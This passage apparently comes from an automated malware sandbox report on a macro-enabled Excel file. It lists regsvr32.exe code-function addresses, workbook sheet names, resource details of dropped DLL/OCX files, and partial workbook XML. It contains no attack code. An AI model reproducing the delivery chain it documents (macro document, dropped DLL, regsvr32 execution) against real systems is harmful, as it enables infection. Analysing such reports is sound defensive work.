                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00983F095_2_00983F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00981B095_2_00981B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009819305_2_00981930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009891335_2_00989133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099C5355_2_0099C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099692B5_2_0099692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099112D5_2_0099112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098BB235_2_0098BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098DB595_2_0098DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009843425_2_00984342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098E3795_2_0098E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00990F7A5_2_00990F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00995D685_2_00995D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099C16B5_2_0099C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005804186_2_00580418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057BE096_2_0057BE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057B4FC6_2_0057B4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005766B06_2_005766B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00576CBB6_2_00576CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058EAA36_2_0058EAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057D3466_2_0057D346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058D14C6_2_0058D14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005735116_2_00573511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0059110E6_2_0059110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005747006_2_00574700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057F1D56_2_0057F1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00581FD06_2_00581FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005809F96_2_005809F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005863F06_2_005863F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057E1A96_2_0057E1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0059225A6_2_0059225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00573C516_2_00573C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058F24C6_2_0058F24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00574E776_2_00574E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00580C7C6_2_00580C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005874736_2_00587473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00578C7C6_2_00578C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005722796_2_00572279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005718656_2_00571865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00590E6D6_2_00590E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0059086F6_2_0059086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058F0606_2_0058F060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005796176_2_00579617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00591E196_2_00591E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058DE116_2_0058DE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058E6126_2_0058E612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057A01C6_2_0057A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B2156_2_0058B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057B2006_2_0057B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057F43B6_2_0057F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058882F6_2_0058882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058DAD86_2_0058DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00583CDD6_2_00583CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057CED86_2_0057CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005772CC6_2_005772CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005718F66_2_005718F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058BAF26_2_0058BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00591AE96_2_00591AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005788E56_2_005788E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058EC9B6_2_0058EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00575C9A6_2_00575C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057D8996_2_0057D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005854976_2_00585497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005800976_2_00580097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00576A8D6_2_00576A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057508B6_2_0057508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B6876_2_0058B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058D6B16_2_0058D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058A4B56_2_0058A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005816AD6_2_005816AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057DB596_2_0057DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005743426_2_00574342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00580F7A6_2_00580F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057E3796_2_0057E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00585D686_2_00585D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058C16B6_2_0058C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00573F096_2_00573F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00571B096_2_00571B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005791336_2_00579133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005719306_2_00571930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058C5356_2_0058C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058692B6_2_0058692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057BB236_2_0057BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058112D6_2_0058112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005927DF6_2_005927DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057C7D16_2_0057C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005847D26_2_005847D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005841CF6_2_005841CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005913FD6_2_005913FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005903F26_2_005903F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005851E86_2_005851E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005759956_2_00575995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005775996_2_00577599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005777866_2_00577786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058E18B6_2_0058E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0057F7846_2_0057F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00579B806_2_00579B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005891846_2_00589184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058B3846_2_0058B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00574BB46_2_00574BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058AFB06_2_0058AFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_005895A86_2_005895A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_00581DA66_2_00581DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D04188_2_001D0418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CBE098_2_001CBE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C6CBB8_2_001C6CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C66B08_2_001C66B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DEAA38_2_001DEAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CB4FC8_2_001CB4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C35118_2_001C3511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E110E8_2_001E110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C47008_2_001C4700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DD14C8_2_001DD14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CD3468_2_001CD346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CE1A98_2_001CE1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF1D58_2_001CF1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D1FD08_2_001D1FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D09F98_2_001D09F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D63F08_2_001D63F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CA01C8_2_001CA01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E1E198_2_001E1E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB2158_2_001DB215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C96178_2_001C9617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DDE118_2_001DDE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DE6128_2_001DE612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CB2008_2_001CB200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF43B8_2_001CF43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D882F8_2_001D882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E225A8_2_001E225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C3C518_2_001C3C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DF24C8_2_001DF24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C8C7C8_2_001C8C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D0C7C8_2_001D0C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C22798_2_001C2279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C4E778_2_001C4E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D74738_2_001D7473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E086F8_2_001E086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E0E6D8_2_001E0E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C18658_2_001C1865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DF0608_2_001DF060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CD8998_2_001CD899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DEC9B8_2_001DEC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C5C9A8_2_001C5C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D54978_2_001D5497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D00978_2_001D0097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C6A8D8_2_001C6A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C508B8_2_001C508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB6878_2_001DB687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DA4B58_2_001DA4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DD6B18_2_001DD6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D16AD8_2_001D16AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D3CDD8_2_001D3CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CCED88_2_001CCED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DDAD88_2_001DDAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C72CC8_2_001C72CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C18F68_2_001C18F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DBAF28_2_001DBAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E1AE98_2_001E1AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C88E58_2_001C88E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C3F098_2_001C3F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C1B098_2_001C1B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DC5358_2_001DC535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C19308_2_001C1930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C91338_2_001C9133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D112D8_2_001D112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D692B8_2_001D692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CBB238_2_001CBB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CDB598_2_001CDB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C43428_2_001C4342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CE3798_2_001CE379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D0F7A8_2_001D0F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D5D688_2_001D5D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DC16B8_2_001DC16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C75998_2_001C7599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C59958_2_001C5995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DE18B8_2_001DE18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CF7848_2_001CF784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DB3848_2_001DB384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D91848_2_001D9184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C77868_2_001C7786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C9B808_2_001C9B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001C4BB48_2_001C4BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DAFB08_2_001DAFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D95A88_2_001D95A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D1DA68_2_001D1DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E27DF8_2_001E27DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001CC7D18_2_001CC7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D47D28_2_001D47D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D41CF8_2_001D41CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E13FD8_2_001E13FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001E03F28_2_001E03F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001D51E88_2_001D51E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047BE099_2_0047BE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004804189_2_00480418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047B4FC9_2_0047B4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048EAA39_2_0048EAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004766B09_2_004766B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00476CBB9_2_00476CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047D3469_2_0047D346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048D14C9_2_0048D14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049110E9_2_0049110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004747009_2_00474700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004735119_2_00473511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F1D59_2_0047F1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00481FD09_2_00481FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004809F99_2_004809F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004863F09_2_004863F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047E1A99_2_0047E1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048F24C9_2_0048F24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049225A9_2_0049225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00473C519_2_00473C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004718659_2_00471865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00490E6D9_2_00490E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0049086F9_2_0049086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048F0609_2_0048F060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00474E779_2_00474E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00480C7C9_2_00480C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004874739_2_00487473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00478C7C9_2_00478C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004722799_2_00472279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047B2009_2_0047B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004796179_2_00479617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00491E199_2_00491E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048DE119_2_0048DE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048E6129_2_0048E612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047A01C9_2_0047A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B2159_2_0048B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048882F9_2_0048882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F43B9_2_0047F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004772CC9_2_004772CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048DAD89_2_0048DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00483CDD9_2_00483CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047CED89_2_0047CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00491AE99_2_00491AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004788E59_2_004788E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004718F69_2_004718F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048BAF29_2_0048BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00476A8D9_2_00476A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047508B9_2_0047508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B6879_2_0048B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048EC9B9_2_0048EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00475C9A9_2_00475C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047D8999_2_0047D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004854979_2_00485497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004800979_2_00480097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004816AD9_2_004816AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048D6B19_2_0048D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048A4B59_2_0048A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004743429_2_00474342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047DB599_2_0047DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00485D689_2_00485D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048C16B9_2_0048C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00480F7A9_2_00480F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047E3799_2_0047E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00473F099_2_00473F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00471B099_2_00471B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048692B9_2_0048692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047BB239_2_0047BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048112D9_2_0048112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004791339_2_00479133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004719309_2_00471930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048C5359_2_0048C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004841CF9_2_004841CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004927DF9_2_004927DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047C7D19_2_0047C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004847D29_2_004847D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004851E89_2_004851E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004913FD9_2_004913FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004903F29_2_004903F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004777869_2_00477786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048E18B9_2_0048E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0047F7849_2_0047F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00479B809_2_00479B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004891849_2_00489184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048B3849_2_0048B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004759959_2_00475995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004775999_2_00477599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_004895A89_2_004895A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00481DA69_2_00481DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00474BB49_2_00474BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048AFB09_2_0048AFB0
                        Source: commenti_19265309.xlsmMacro extractor: Sheet name: Je1
                        Source: commenti_19265309.xlsmMacro extractor: Sheet name: Je2
                        Source: commenti_19265309.xlsmMacro extractor: Sheet name: EFALGV
                        Source: commenti_19265309.xlsmMacro extractor: Sheet name: EFALGV
                        Source: commenti_19265309.xlsmMacro extractor: Sheet name: Je1
                        Source: Lg1r0mo1[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Lg1r0mo1[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: sei.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: sei.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BB1DE8A2-6C62-497D-9C8A-3A65EB24A263}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" 